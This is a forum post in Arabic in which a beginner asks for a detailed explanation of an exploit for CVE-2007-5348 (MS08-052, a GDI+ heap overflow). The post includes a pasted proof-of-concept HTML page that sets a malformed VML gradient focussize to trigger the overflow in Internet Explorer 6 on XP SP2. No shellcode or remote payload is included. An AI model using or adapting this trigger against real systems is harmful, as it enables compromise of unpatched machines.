السلام عليكم:
انا اريد ان استكشف عمل نقطة الضعف رقم (cve-2007-5348)
في برامج مايكروسوفت، طبعا انا قليل خبرة بالبرمجة وصار عندي الكثير من الاسئلة بعد بحثي في هذا الموضوع واتمنى منكم المساعدة بما تستطيعون
طبعا هنا نقطة الضعف ملخصها انها تمكن الهاكر من الدخول على الجهاز من بعد وتنفيذ الاوامر عن بعد
البرنامج بحسب بحثي يتكون من قسمين : القسم الاول هو الكود الرئيسي المقروء والقسم الثاني هو مايسمى بالـ بيلود والذي يستخدمه الهاكر للحصول على الكوماند لاين برومبت.
انا بصراحة جديد على هذه الساحة ولذلك طلبت المساعدة.
طبعا السورس كود موجود عندي وسأضعه في الأسفل (لأن الموقع لم يسمح لي ان ارفعه في ملف تكست ولا اعلم لماذا) ولكن مالا اعلمه انه هل البيلود مخفي داخل السورس كود ام انه مستقل؟
طبعا انا اعتقد ان السورس كود مكتوب بلغة جافا سكربت واتمنى من الاخوة الخبيرين ان يعطوني بالتفصيل مالذي يفعله هذا البرنامج مع العلم ان الهدف منه هو انه يعمل هيب بفر اوفر فلو ولكني اريد تفصيل العملية مالذي يحصل بالضبط لأني اريد ان افهم البرنامج كاملا
الكود هو الاتي:
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>
<body>
<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
Link: http://www.evilfingers.com/patchTuesday/MS...lnerability.txt
================================================
</pre>
<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef">
<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>
<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');
ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>
<html>